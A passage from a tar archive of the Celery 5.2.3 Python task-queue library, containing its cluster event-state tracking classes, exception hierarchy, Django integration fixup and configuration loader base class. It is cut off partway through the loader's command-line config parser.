_warn_drift(hostname, drift, local_received, timestamp): # we use memoize here so the warning is only logged once per hostname warn(DRIFT_WARNING, hostname, drift, datetime.fromtimestamp(local_received), datetime.fromtimestamp(timestamp)) def heartbeat_expires(timestamp, freq=60, expire_window=HEARTBEAT_EXPIRE_WINDOW, Decimal=Decimal, float=float, isinstance=isinstance): """Return time when heartbeat expires.""" # some json implementations returns decimal.Decimal objects, # which aren't compatible with float. freq = float(freq) if isinstance(freq, Decimal) else freq if isinstance(timestamp, Decimal): timestamp = float(timestamp) return timestamp + (freq * (expire_window / 1e2)) def _depickle_task(cls, fields): return cls(**fields) def with_unique_field(attr): def _decorate_cls(cls): def __eq__(this, other): if isinstance(other, this.__class__): return getattr(this, attr) == getattr(other, attr) return NotImplemented cls.__eq__ = __eq__ def __ne__(this, other): res = this.__eq__(other) return True if res is NotImplemented else not res cls.__ne__ = __ne__ def __hash__(this): return hash(getattr(this, attr)) cls.__hash__ = __hash__ return cls return _decorate_cls @with_unique_field('hostname') class Worker: """Worker State.""" heartbeat_max = 4 expire_window = HEARTBEAT_EXPIRE_WINDOW _fields = ('hostname', 'pid', 'freq', 'heartbeats', 'clock', 'active', 'processed', 'loadavg', 'sw_ident', 'sw_ver', 'sw_sys') if not PYPY: # pragma: no cover __slots__ = _fields + ('event', '__dict__', '__weakref__') def __init__(self, hostname=None, pid=None, freq=60, heartbeats=None, clock=0, active=None, processed=None, loadavg=None, sw_ident=None, sw_ver=None, sw_sys=None): self.hostname = hostname self.pid = pid self.freq = freq self.heartbeats = [] if heartbeats is None else heartbeats self.clock = clock or 0 self.active = active self.processed = processed self.loadavg = loadavg self.sw_ident = sw_ident self.sw_ver = sw_ver self.sw_sys = sw_sys self.event = self._create_event_handler() def __reduce__(self): return self.__class__, (self.hostname, self.pid, self.freq, self.heartbeats, self.clock, self.active, self.processed, self.loadavg, self.sw_ident, self.sw_ver, self.sw_sys) def _create_event_handler(self): _set = object.__setattr__ hbmax = self.heartbeat_max heartbeats = self.heartbeats hb_pop = self.heartbeats.pop hb_append = self.heartbeats.append def event(type_, timestamp=None, local_received=None, fields=None, max_drift=HEARTBEAT_DRIFT_MAX, abs=abs, int=int, insort=bisect.insort, len=len): fields = fields or {} for k, v in fields.items(): _set(self, k, v) if type_ == 'offline': heartbeats[:] = [] else: if not local_received or not timestamp: return drift = abs(int(local_received) - int(timestamp)) if drift > max_drift: _warn_drift(self.hostname, drift, local_received, timestamp) if local_received: # pragma: no cover hearts = len(heartbeats) if hearts > hbmax - 1: hb_pop(0) if hearts and local_received > heartbeats[-1]: hb_append(local_received) else: insort(heartbeats, local_received) return event def update(self, f, **kw): d = dict(f, **kw) if kw else f for k, v in d.items(): setattr(self, k, v) def __repr__(self): return R_WORKER.format(self) @property def status_string(self): return 'ONLINE' if self.alive else 'OFFLINE' @property def heartbeat_expires(self): return heartbeat_expires(self.heartbeats[-1], self.freq, self.expire_window) @property def alive(self, nowfun=time): return bool(self.heartbeats and nowfun() < self.heartbeat_expires) @property def id(self): return '{0.hostname}.{0.pid}'.format(self) @with_unique_field('uuid') class Task: """Task State.""" name = received = sent = started = succeeded = failed = retried = \ revoked = rejected = args = kwargs = eta = expires = retries = \ worker = result = exception = timestamp = runtime = traceback = \ exchange = routing_key = root_id = parent_id = client = None state = states.PENDING clock = 0 _fields = ( 'uuid', 'name', 'state', 'received', 'sent', 'started', 'rejected', 'succeeded', 'failed', 'retried', 'revoked', 'args', 'kwargs', 'eta', 'expires', 'retries', 'worker', 'result', 'exception', 'timestamp', 'runtime', 'traceback', 'exchange', 'routing_key', 'clock', 'client', 'root', 'root_id', 'parent', 'parent_id', 'children', ) if not PYPY: # pragma: no cover __slots__ = ('__dict__', '__weakref__') #: How to merge out of order events. #: Disorder is detected by logical ordering (e.g., :event:`task-received` #: must've happened before a :event:`task-failed` event). #: #: A merge rule consists of a state and a list of fields to keep from #: that state. ``(RECEIVED, ('name', 'args')``, means the name and args #: fields are always taken from the RECEIVED state, and any values for #: these fields received before or after is simply ignored. merge_rules = { states.RECEIVED: ( 'name', 'args', 'kwargs', 'parent_id', 'root_id', 'retries', 'eta', 'expires', ), } #: meth:`info` displays these fields by default. _info_fields = ( 'args', 'kwargs', 'retries', 'result', 'eta', 'runtime', 'expires', 'exception', 'exchange', 'routing_key', 'root_id', 'parent_id', ) def __init__(self, uuid=None, cluster_state=None, children=None, **kwargs): self.uuid = uuid self.cluster_state = cluster_state if self.cluster_state is not None: self.children = WeakSet( self.cluster_state.tasks.get(task_id) for task_id in children or () if task_id in self.cluster_state.tasks ) else: self.children = WeakSet() self._serializer_handlers = { 'children': self._serializable_children, 'root': self._serializable_root, 'parent': self._serializable_parent, } if kwargs: self.__dict__.update(kwargs) def event(self, type_, timestamp=None, local_received=None, fields=None, precedence=states.precedence, setattr=setattr, task_event_to_state=TASK_EVENT_TO_STATE.get, RETRY=states.RETRY): fields = fields or {} # using .get is faster than catching KeyError in this case. state = task_event_to_state(type_) if state is not None: # sets, for example, self.succeeded to the timestamp. setattr(self, type_, timestamp) else: state = type_.upper() # custom state # note that precedence here is reversed # see implementation in celery.states.state.__lt__ if state != RETRY and self.state != RETRY and \ precedence(state) > precedence(self.state): # this state logically happens-before the current state, so merge. keep = self.merge_rules.get(state) if keep is not None: fields = { k: v for k, v in fields.items() if k in keep } else: fields.update(state=state, timestamp=timestamp) # update current state with info from this event. self.__dict__.update(fields) def info(self, fields=None, extra=None): """Information about this task suitable for on-screen display.""" extra = [] if not extra else extra fields = self._info_fields if fields is None else fields def _keys(): for key in list(fields) + list(extra): value = getattr(self, key, None) if value is not None: yield key, value return dict(_keys()) def __repr__(self): return R_TASK.format(self) def as_dict(self): get = object.__getattribute__ handler = self._serializer_handlers.get return { k: handler(k, pass1)(get(self, k)) for k in self._fields } def _serializable_children(self, value): return [task.id for task in self.children] def _serializable_root(self, value): return self.root_id def _serializable_parent(self, value): return self.parent_id def __reduce__(self): return _depickle_task, (self.__class__, self.as_dict()) @property def id(self): return self.uuid @property def origin(self): return self.client if self.worker is None else self.worker.id @property def ready(self): return self.state in states.READY_STATES @cached_property def parent(self): # issue github.com/mher/flower/issues/648 try: return self.parent_id and self.cluster_state.tasks.data[self.parent_id] except KeyError: return None @cached_property def root(self): # issue github.com/mher/flower/issues/648 try: return self.root_id and self.cluster_state.tasks.data[self.root_id] except KeyError: return None class State: """Records clusters state.""" Worker = Worker Task = Task event_count = 0 task_count = 0 heap_multiplier = 4 def __init__(self, callback=None, workers=None, tasks=None, taskheap=None, max_workers_in_memory=5000, max_tasks_in_memory=10000, on_node_join=None, on_node_leave=None, tasks_by_type=None, tasks_by_worker=None): self.event_callback = callback self.workers = (LRUCache(max_workers_in_memory) if workers is None else workers) self.tasks = (LRUCache(max_tasks_in_memory) if tasks is None else tasks) self._taskheap = [] if taskheap is None else taskheap self.max_workers_in_memory = max_workers_in_memory self.max_tasks_in_memory = max_tasks_in_memory self.on_node_join = on_node_join self.on_node_leave = on_node_leave self._mutex = threading.Lock() self.handlers = {} self._seen_types = set() self._tasks_to_resolve = {} self.rebuild_taskheap() self.tasks_by_type = CallableDefaultdict( self._tasks_by_type, WeakSet) # type: Mapping[str, WeakSet[Task]] self.tasks_by_type.update( _deserialize_Task_WeakSet_Mapping(tasks_by_type, self.tasks)) self.tasks_by_worker = CallableDefaultdict( self._tasks_by_worker, WeakSet) # type: Mapping[str, WeakSet[Task]] self.tasks_by_worker.update( _deserialize_Task_WeakSet_Mapping(tasks_by_worker, self.tasks)) @cached_property def _event(self): return self._create_dispatcher() def freeze_while(self, fun, *args, **kwargs): clear_after = kwargs.pop('clear_after', False) with self._mutex: try: return fun(*args, **kwargs) finally: if clear_after: self._clear() def clear_tasks(self, ready=True): with self._mutex: return self._clear_tasks(ready) def _clear_tasks(self, ready=True): if ready: in_progress = { uuid: task for uuid, task in self.itertasks() if task.state not in states.READY_STATES } self.tasks.clear() self.tasks.update(in_progress) else: self.tasks.clear() self._taskheap[:] = [] def _clear(self, ready=True): self.workers.clear() self._clear_tasks(ready) self.event_count = 0 self.task_count = 0 def clear(self, ready=True): with self._mutex: return self._clear(ready) def get_or_create_worker(self, hostname, **kwargs): """Get or create worker by hostname. Returns: Tuple: of ``(worker, was_created)`` pairs. """ try: worker = self.workers[hostname] if kwargs: worker.update(kwargs) return worker, False except KeyError: worker = self.workers[hostname] = self.Worker( hostname, **kwargs) return worker, True def get_or_create_task(self, uuid): """Get or create task by uuid.""" try: return self.tasks[uuid], False except KeyError: task = self.tasks[uuid] = self.Task(uuid, cluster_state=self) return task, True def event(self, event): with self._mutex: return self._event(event) def task_event(self, type_, fields): """Deprecated, use :meth:`event`.""" return self._event(dict(fields, type='-'.join(['task', type_])))[0] def worker_event(self, type_, fields): """Deprecated, use :meth:`event`.""" return self._event(dict(fields, type='-'.join(['worker', type_])))[0] def _create_dispatcher(self): # pylint: disable=too-many-statements # This code is highly optimized, but not for reusability. get_handler = self.handlers.__getitem__ event_callback = self.event_callback wfields = itemgetter('hostname', 'timestamp', 'local_received') tfields = itemgetter('uuid', 'hostname', 'timestamp', 'local_received', 'clock') taskheap = self._taskheap th_append = taskheap.append th_pop = taskheap.pop # Removing events from task heap is an O(n) operation, # so easier to just account for the common number of events # for each task (PENDING->RECEIVED->STARTED->final) #: an O(n) operation max_events_in_heap = self.max_tasks_in_memory * self.heap_multiplier add_type = self._seen_types.add on_node_join, on_node_leave = self.on_node_join, self.on_node_leave tasks, Task = self.tasks, self.Task workers, Worker = self.workers, self.Worker # avoid updating LRU entry at getitem get_worker, get_task = workers.data.__getitem__, tasks.data.__getitem__ get_task_by_type_set = self.tasks_by_type.__getitem__ get_task_by_worker_set = self.tasks_by_worker.__getitem__ def _event(event, timetuple=timetuple, KeyError=KeyError, insort=bisect.insort, created=True): self.event_count += 1 if event_callback: event_callback(self, event) group, _, subject = event['type'].partition('-') try: handler = get_handler(group) except KeyError: pass else: return handler(subject, event), subject if group == 'worker': try: hostname, timestamp, local_received = wfields(event) except KeyError: pass else: is_offline = subject == 'offline' try: worker, created = get_worker(hostname), False except KeyError: if is_offline: worker, created = Worker(hostname), False else: worker = workers[hostname] = Worker(hostname) worker.event(subject, timestamp, local_received, event) if on_node_join and (created or subject == 'online'): on_node_join(worker) if on_node_leave and is_offline: on_node_leave(worker) workers.pop(hostname, None) return (worker, created), subject elif group == 'task': (uuid, hostname, timestamp, local_received, clock) = tfields(event) # task-sent event is sent by client, not worker is_client_event = subject == 'sent' try: task, task_created = get_task(uuid), False except KeyError: task = tasks[uuid] = Task(uuid, cluster_state=self) task_created = True if is_client_event: task.client = hostname else: try: worker = get_worker(hostname) except KeyError: worker = workers[hostname] = Worker(hostname) task.worker = worker if worker is not None and local_received: worker.event(None, local_received, timestamp) origin = hostname if is_client_event else worker.id # remove oldest event if exceeding the limit. heaps = len(taskheap) if heaps + 1 > max_events_in_heap: th_pop(0) # most events will be dated later than the previous. timetup = timetuple(clock, timestamp, origin, ref(task)) if heaps and timetup > taskheap[-1]: th_append(timetup) else: insort(taskheap, timetup) if subject == 'received': self.task_count += 1 task.event(subject, timestamp, local_received, event) task_name = task.name if task_name is not None: add_type(task_name) if task_created: # add to tasks_by_type index get_task_by_type_set(task_name).add(task) get_task_by_worker_set(hostname).add(task) if task.parent_id: try: parent_task = self.tasks[task.parent_id] except KeyError: self._add_pending_task_child(task) else: parent_task.children.add(task) try: _children = self._tasks_to_resolve.pop(uuid) except KeyError: pass else: task.children.update(_children) return (task, task_created), subject return _event def _add_pending_task_child(self, task): try: ch = self._tasks_to_resolve[task.parent_id] except KeyError: ch = self._tasks_to_resolve[task.parent_id] = WeakSet() ch.add(task) def rebuild_taskheap(self, timetuple=timetuple): heap = self._taskheap[:] = [ timetuple(t.clock, t.timestamp, t.origin, ref(t)) for t in self.tasks.values() ] heap.sort() def itertasks(self, limit=None): for index, row in enumerate(self.tasks.items()): yield row if limit and index + 1 >= limit: break def tasks_by_time(self, limit=None, reverse=True): """Generator yielding tasks ordered by time. Yields: Tuples of ``(uuid, Task)``. """ _heap = self._taskheap if reverse: _heap = reversed(_heap) seen = set() for evtup in islice(_heap, 0, limit): task = evtup[3]() if task is not None: uuid = task.uuid if uuid not in seen: yield uuid, task seen.add(uuid) tasks_by_timestamp = tasks_by_time def _tasks_by_type(self, name, limit=None, reverse=True): """Get all tasks by type. This is slower than accessing :attr:`tasks_by_type`, but will be ordered by time. Returns: Generator: giving ``(uuid, Task)`` pairs. """ return islice( ((uuid, task) for uuid, task in self.tasks_by_time(reverse=reverse) if task.name == name), 0, limit, ) def _tasks_by_worker(self, hostname, limit=None, reverse=True): """Get all tasks by worker. Slower than accessing :attr:`tasks_by_worker`, but ordered by time. """ return islice( ((uuid, task) for uuid, task in self.tasks_by_time(reverse=reverse) if task.worker.hostname == hostname), 0, limit, ) def task_types(self): """Return a list of all seen task types.""" return sorted(self._seen_types) def alive_workers(self): """Return a list of (seemingly) alive workers.""" return (w for w in self.workers.values() if w.alive) def __repr__(self): return R_STATE.format(self) def __reduce__(self): return self.__class__, ( self.event_callback, self.workers, self.tasks, None, self.max_workers_in_memory, self.max_tasks_in_memory, self.on_node_join, self.on_node_leave, _serialize_Task_WeakSet_Mapping(self.tasks_by_type), _serialize_Task_WeakSet_Mapping(self.tasks_by_worker), ) def _serialize_Task_WeakSet_Mapping(mapping): return {name: [t.id for t in tasks] for name, tasks in mapping.items()} def _deserialize_Task_WeakSet_Mapping(mapping, tasks): mapping = mapping or {} return {name: WeakSet(tasks[i] for i in ids if i in tasks) for name, ids in mapping.items()} ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/exceptions.py0000664000175000017500000002150600000000000016717 0ustar00asifasif00000000000000"""Celery error types. Error Hierarchy =============== - :exc:`Exception` - :exc:`celery.exceptions.CeleryError` - :exc:`~celery.exceptions.ImproperlyConfigured` - :exc:`~celery.exceptions.SecurityError` - :exc:`~celery.exceptions.TaskPredicate` - :exc:`~celery.exceptions.Ignore` - :exc:`~celery.exceptions.Reject` - :exc:`~celery.exceptions.Retry` - :exc:`~celery.exceptions.TaskError` - :exc:`~celery.exceptions.QueueNotFound` - :exc:`~celery.exceptions.IncompleteStream` - :exc:`~celery.exceptions.NotRegistered` - :exc:`~celery.exceptions.AlreadyRegistered` - :exc:`~celery.exceptions.TimeoutError` - :exc:`~celery.exceptions.MaxRetriesExceededError` - :exc:`~celery.exceptions.TaskRevokedError` - :exc:`~celery.exceptions.InvalidTaskError` - :exc:`~celery.exceptions.ChordError` - :exc:`~celery.exceptions.BackendError` - :exc:`~celery.exceptions.BackendGetMetaError` - :exc:`~celery.exceptions.BackendStoreError` - :class:`kombu.exceptions.KombuError` - :exc:`~celery.exceptions.OperationalError` Raised when a transport connection error occurs while sending a message (be it a task, remote control command error). .. note:: This exception does not inherit from :exc:`~celery.exceptions.CeleryError`. - **billiard errors** (prefork pool) - :exc:`~celery.exceptions.SoftTimeLimitExceeded` - :exc:`~celery.exceptions.TimeLimitExceeded` - :exc:`~celery.exceptions.WorkerLostError` - :exc:`~celery.exceptions.Terminated` - :class:`UserWarning` - :class:`~celery.exceptions.CeleryWarning` - :class:`~celery.exceptions.AlwaysEagerIgnored` - :class:`~celery.exceptions.DuplicateNodenameWarning` - :class:`~celery.exceptions.FixupWarning` - :class:`~celery.exceptions.NotConfigured` - :class:`~celery.exceptions.SecurityWarning` - :exc:`BaseException` - :exc:`SystemExit` - :exc:`~celery.exceptions.WorkerTerminate` - :exc:`~celery.exceptions.WorkerShutdown` """ import numbers from billiard.exceptions import (SoftTimeLimitExceeded, Terminated, TimeLimitExceeded, WorkerLostError) from click import ClickException from kombu.exceptions import OperationalError __all__ = ( 'reraise', # Warnings 'CeleryWarning', 'AlwaysEagerIgnored', 'DuplicateNodenameWarning', 'FixupWarning', 'NotConfigured', 'SecurityWarning', # Core errors 'CeleryError', 'ImproperlyConfigured', 'SecurityError', # Kombu (messaging) errors. 'OperationalError', # Task semi-predicates 'TaskPredicate', 'Ignore', 'Reject', 'Retry', # Task related errors. 'TaskError', 'QueueNotFound', 'IncompleteStream', 'NotRegistered', 'AlreadyRegistered', 'TimeoutError', 'MaxRetriesExceededError', 'TaskRevokedError', 'InvalidTaskError', 'ChordError', # Backend related errors. 'BackendError', 'BackendGetMetaError', 'BackendStoreError', # Billiard task errors. 'SoftTimeLimitExceeded', 'TimeLimitExceeded', 'WorkerLostError', 'Terminated', # Deprecation warnings (forcing Python to emit them). 'CPendingDeprecationWarning', 'CDeprecationWarning', # Worker shutdown semi-predicates (inherits from SystemExit). 'WorkerShutdown', 'WorkerTerminate', 'CeleryCommandException', ) UNREGISTERED_FMT = """\ Task of kind {0} never registered, please make sure it's imported.\ """ def reraise(tp, value, tb=None): """Reraise exception.""" if value.__traceback__ is not tb: raise value.with_traceback(tb) raise value class CeleryWarning(UserWarning): """Base class for all Celery warnings.""" class AlwaysEagerIgnored(CeleryWarning): """send_task ignores :setting:`task_always_eager` option.""" class DuplicateNodenameWarning(CeleryWarning): """Multiple workers are using the same nodename.""" class FixupWarning(CeleryWarning): """Fixup related warning.""" class NotConfigured(CeleryWarning): """Celery hasn't been configured, as no config module has been found.""" class SecurityWarning(CeleryWarning): """Potential security issue found.""" class CeleryError(Exception): """Base class for all Celery errors.""" class TaskPredicate(CeleryError): """Base class for task-related semi-predicates.""" class Retry(TaskPredicate): """The task is to be retried later.""" #: Optional message describing context of retry. message = None #: Exception (if any) that caused the retry to happen. exc = None #: Time of retry (ETA), either :class:`numbers.Real` or #: :class:`~datetime.datetime`. when = None def __init__(self, message=None, exc=None, when=None, is_eager=False, sig=None, **kwargs): from kombu.utils.encoding import safe_repr self.message = message if isinstance(exc, str): self.exc, self.excs = None, exc else: self.exc, self.excs = exc, safe_repr(exc) if exc else None self.when = when self.is_eager = is_eager self.sig = sig super().__init__(self, exc, when, **kwargs) def humanize(self): if isinstance(self.when, numbers.Number): return f'in {self.when}s' return f'at {self.when}' def __str__(self): if self.message: return self.message if self.excs: return f'Retry {self.humanize()}: {self.excs}' return f'Retry {self.humanize()}' def __reduce__(self): return self.__class__, (self.message, self.exc, self.when) RetryTaskError = Retry # XXX compat class Ignore(TaskPredicate): """A task can raise this to ignore doing state updates.""" class Reject(TaskPredicate): """A task can raise this if it wants to reject/re-queue the message.""" def __init__(self, reason=None, requeue=False): self.reason = reason self.requeue = requeue super().__init__(reason, requeue) def __repr__(self): return f'reject requeue={self.requeue}: {self.reason}' class ImproperlyConfigured(CeleryError): """Celery is somehow improperly configured.""" class SecurityError(CeleryError): """Security related exception.""" class TaskError(CeleryError): """Task related errors.""" class QueueNotFound(KeyError, TaskError): """Task routed to a queue not in ``conf.queues``.""" class IncompleteStream(TaskError): """Found the end of a stream of data, but the data isn't complete.""" class NotRegistered(KeyError, TaskError): """The task is not registered.""" def __repr__(self): return UNREGISTERED_FMT.format(self) class AlreadyRegistered(TaskError): """The task is already registered.""" # XXX Unused class TimeoutError(TaskError): """The operation timed out.""" class MaxRetriesExceededError(TaskError): """The tasks max restart limit has been exceeded.""" def __init__(self, *args, **kwargs): self.task_args = kwargs.pop("task_args", []) self.task_kwargs = kwargs.pop("task_kwargs", dict()) super().__init__(*args, **kwargs) class TaskRevokedError(TaskError): """The task has been revoked, so no result available.""" class InvalidTaskError(TaskError): """The task has invalid data or ain't properly constructed.""" class ChordError(TaskError): """A task part of the chord raised an exception.""" class CPendingDeprecationWarning(PendingDeprecationWarning): """Warning of pending deprecation.""" class CDeprecationWarning(DeprecationWarning): """Warning of deprecation.""" class WorkerTerminate(SystemExit): """Signals that the worker should terminate immediately.""" SystemTerminate = WorkerTerminate # XXX compat class WorkerShutdown(SystemExit): """Signals that the worker should perform a warm shutdown.""" class BackendError(Exception): """An issue writing or reading to/from the backend.""" class BackendGetMetaError(BackendError): """An issue reading from the backend.""" def __init__(self, *args, **kwargs): self.task_id = kwargs.get('task_id', "") def __repr__(self): return super().__repr__() + " task_id:" + self.task_id class BackendStoreError(BackendError): """An issue writing to the backend.""" def __init__(self, *args, **kwargs): self.state = kwargs.get('state', "") self.task_id = kwargs.get('task_id', "") def __repr__(self): return super().__repr__() + " state:" + self.state + " task_id:" + self.task_id class CeleryCommandException(ClickException): """A general command exception which stores an exit code.""" def __init__(self, message, exit_code): super().__init__(message=message) self.exit_code = exit_code ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4597507 celery-5.2.3/celery/fixups/0000775000175000017500000000000000000000000015476 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/fixups/__init__.py0000664000175000017500000000001600000000000017604 0ustar00asifasif00000000000000"""Fixups.""" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/fixups/django.py0000664000175000017500000001467400000000000017326 0ustar00asifasif00000000000000"""Django-specific customization.""" import os import sys import warnings from datetime import datetime from importlib import import_module from kombu.utils.imports import symbol_by_name from kombu.utils.objects import cached_property from celery import _state, signals from celery.exceptions import FixupWarning, ImproperlyConfigured __all__ = ('DjangoFixup', 'fixup') ERR_NOT_INSTALLED = """\ Environment variable DJANGO_SETTINGS_MODULE is defined but Django isn't installed. Won't apply Django fix-ups! """ def _maybe_close_fd(fh): try: os.close(fh.fileno()) except (AttributeError, OSError, TypeError): # TypeError added for celery#962 pass def _verify_django_version(django): if django.VERSION < (1, 11): raise ImproperlyConfigured('Celery 5.x requires Django 1.11 or later.') def fixup(app, env='DJANGO_SETTINGS_MODULE'): """Install Django fixup if settings module environment is set.""" SETTINGS_MODULE = os.environ.get(env) if SETTINGS_MODULE and 'django' not in app.loader_cls.lower(): try: import django except ImportError: warnings.warn(FixupWarning(ERR_NOT_INSTALLED)) else: _verify_django_version(django) return DjangoFixup(app).install() class DjangoFixup: """Fixup installed when using Django.""" def __init__(self, app): self.app = app if _state.default_app is None: self.app.set_default() self._worker_fixup = None def install(self): # Need to add project directory to path. # The project directory has precedence over system modules, # so we prepend it to the path. sys.path.insert(0, os.getcwd()) self._settings = symbol_by_name('django.conf:settings') self.app.loader.now = self.now signals.import_modules.connect(self.on_import_modules) signals.worker_init.connect(self.on_worker_init) return self @property def worker_fixup(self): if self._worker_fixup is None: self._worker_fixup = DjangoWorkerFixup(self.app) return self._worker_fixup @worker_fixup.setter def worker_fixup(self, value): self._worker_fixup = value def on_import_modules(self, **kwargs): # call django.setup() before task modules are imported self.worker_fixup.validate_models() def on_worker_init(self, **kwargs): self.worker_fixup.install() def now(self, utc=False): return datetime.utcnow() if utc else self._now() def autodiscover_tasks(self): from django.apps import apps return [config.name for config in apps.get_app_configs()] @cached_property def _now(self): return symbol_by_name('django.utils.timezone:now') class DjangoWorkerFixup: _db_recycles = 0 def __init__(self, app): self.app = app self.db_reuse_max = self.app.conf.get('CELERY_DB_REUSE_MAX', None) self._db = import_module('django.db') self._cache = import_module('django.core.cache') self._settings = symbol_by_name('django.conf:settings') self.interface_errors = ( symbol_by_name('django.db.utils.InterfaceError'), ) self.DatabaseError = symbol_by_name('django.db:DatabaseError') def django_setup(self): import django django.setup() def validate_models(self): from django.core.checks import run_checks self.django_setup() run_checks() def install(self): signals.beat_embedded_init.connect(self.close_database) signals.worker_ready.connect(self.on_worker_ready) signals.task_prerun.connect(self.on_task_prerun) signals.task_postrun.connect(self.on_task_postrun) signals.worker_process_init.connect(self.on_worker_process_init) self.close_database() self.close_cache() return self def on_worker_process_init(self, **kwargs): # Child process must validate models again if on Windows, # or if they were started using execv. if os.environ.get('FORKED_BY_MULTIPROCESSING'): self.validate_models() # close connections: # the parent process may have established these, # so need to close them. # calling db.close() on some DB connections will cause # the inherited DB conn to also get broken in the parent # process so we need to remove it without triggering any # network IO that close() might cause. for c in self._db.connections.all(): if c and c.connection: self._maybe_close_db_fd(c.connection) # use the _ version to avoid DB_REUSE preventing the conn.close() call self._close_database(force=True) self.close_cache() def _maybe_close_db_fd(self, fd): try: _maybe_close_fd(fd) except self.interface_errors: pass def on_task_prerun(self, sender, **kwargs): """Called before every task.""" if not getattr(sender.request, 'is_eager', False): self.close_database() def on_task_postrun(self, sender, **kwargs): # See https://groups.google.com/group/django-users/ # browse_thread/thread/78200863d0c07c6d/ if not getattr(sender.request, 'is_eager', False): self.close_database() self.close_cache() def close_database(self, **kwargs): if not self.db_reuse_max: return self._close_database() if self._db_recycles >= self.db_reuse_max * 2: self._db_recycles = 0 self._close_database() self._db_recycles += 1 def _close_database(self, force=False): for conn in self._db.connections.all(): try: if force: conn.close() else: conn.close_if_unusable_or_obsolete() except self.interface_errors: pass except self.DatabaseError as exc: str_exc = str(exc) if 'closed' not in str_exc and 'not connected' not in str_exc: raise def close_cache(self): try: self._cache.close_caches() except (TypeError, AttributeError): pass def on_worker_ready(self, **kwargs): if self._settings.DEBUG: warnings.warn('''Using settings.DEBUG leads to a memory leak, never use this setting in production environments!''') ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4637508 celery-5.2.3/celery/loaders/0000775000175000017500000000000000000000000015611 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/loaders/__init__.py0000664000175000017500000000075200000000000017726 0ustar00asifasif00000000000000"""Get loader by name. Loaders define how configuration is read, what happens when workers start, when tasks are executed and so on. """ from celery.utils.imports import import_from_cwd, symbol_by_name __all__ = ('get_loader_cls',) LOADER_ALIASES = { 'app': 'celery.loaders.app:AppLoader', 'default': 'celery.loaders.default:Loader', } def get_loader_cls(loader): """Get loader class by name/alias.""" return symbol_by_name(loader, LOADER_ALIASES, imp=import_from_cwd) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/loaders/app.py0000664000175000017500000000030700000000000016743 0ustar00asifasif00000000000000"""The default loader used with custom app instances.""" from .base import BaseLoader __all__ = ('AppLoader',) class AppLoader(BaseLoader): """Default loader used when an app is specified.""" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/loaders/base.py0000664000175000017500000002123500000000000017100 0ustar00asifasif00000000000000"""Loader base class.""" import importlib import os import re import sys from datetime import datetime from kombu.utils import json from kombu.utils.objects import cached_property from celery import signals from celery.exceptions import reraise from celery.utils.collections import DictAttribute, force_mapping from celery.utils.functional import maybe_list from celery.utils.imports import (NotAPackage, find_module, import_from_cwd, symbol_by_name) __all__ = ('BaseLoader',) _RACE_PROTECTION = False CONFIG_INVALID_NAME = """\ Error: Module '{module}' doesn't exist, or it's not a valid \ Python module name. """ CONFIG_WITH_SUFFIX = CONFIG_INVALID_NAME + """\ Did you mean '{suggest}'? """ unconfigured = object() class BaseLoader: """Base class for loaders. Loaders handles, * Reading celery client/worker configurations. * What happens when a task starts? See :meth:`on_task_init`. * What happens when the worker starts? See :meth:`on_worker_init`. * What happens when the worker shuts down? See :meth:`on_worker_shutdown`. * What modules are imported to find tasks? """ builtin_modules = frozenset() configured = False override_backends = {} worker_initialized = False _conf = unconfigured def __init__(self, app, **kwargs): self.app = app self.task_modules = set() def now(self, utc=True): if utc: return datetime.utcnow() return datetime.now() def on_task_init(self, task_id, task): """Called before a task is executed.""" def on_process_cleanup(self): """Called after a task is executed.""" def on_worker_init(self): """Called when the worker (:program:`celery worker`) starts.""" def on_worker_shutdown(self): """Called when the worker (:program:`celery worker`) shuts down.""" def on_worker_process_init(self): """Called when a child process starts.""" def import_task_module(self, module): self.task_modules.add(module) return self.import_from_cwd(module) def import_module(self, module, package=None): return importlib.import_module(module, package=package) def import_from_cwd(self, module, imp=None, package=None): return import_from_cwd( module, self.import_module if imp is None else imp, package=package, ) def import_default_modules(self): responses = signals.import_modules.send(sender=self.app) # Prior to this point loggers are not yet set up properly, need to # check responses manually and reraised exceptions if any, otherwise # they'll be silenced, making it incredibly difficult to debug. for _, response in responses: if isinstance(response, Exception): raise response return [self.import_task_module(m) for m in self.default_modules] def init_worker(self): if not self.worker_initialized: self.worker_initialized = True self.import_default_modules() self.on_worker_init() def shutdown_worker(self): self.on_worker_shutdown() def init_worker_process(self): self.on_worker_process_init() def config_from_object(self, obj, silent=False): if isinstance(obj, str): try: obj = self._smart_import(obj, imp=self.import_from_cwd) except (ImportError, AttributeError): if silent: return False raise self._conf = force_mapping(obj) if self._conf.get('override_backends') is not None: self.override_backends = self._conf['override_backends'] return True def _smart_import(self, path, imp=None): imp = self.import_module if imp is None else imp if ':' in path: # Path includes attribute so can just jump # here (e.g., ``os.path:abspath``). return symbol_by_name(path, imp=imp) # Not sure if path is just a module name or if it includes an # attribute name (e.g., ``os.path``, vs, ``os.path.abspath``). try: return imp(path) except ImportError: # Not a module name, so try module + attribute. return symbol_by_name(path, imp=imp) def _import_config_module(self, name): try: self.find_module(name) except NotAPackage as exc: if name.endswith('.py'): reraise(NotAPackage, NotAPackage(CONFIG_WITH_SUFFIX.format( module=name, suggest=name[:-3])), sys.exc_info()[2]) raise NotAPackage(CONFIG_INVALID_NAME.format(module=name)) from exc else: return self.import_from_cwd(name) def find_module(self, module): return find_module(module) def cmdline_config_parser(self, args, namespace='celery', re_type=re.compile(r'\((\w+)\)'), extra_types=None, override_types=None): extra_types = extra_types if extra_types else {'json': json.loads} override_types = override_types if override_types else { 'tuple': 'json', 'list': 'json', 'dict': 'json' } from celery.app.defaults import NAMESPACES, Option namespace = namespace and namespace.lower() typemap = dict(Option.typemap, **extra_types) def getarg(arg): """Parse single configuration from command-line.""" # ## find key/value # 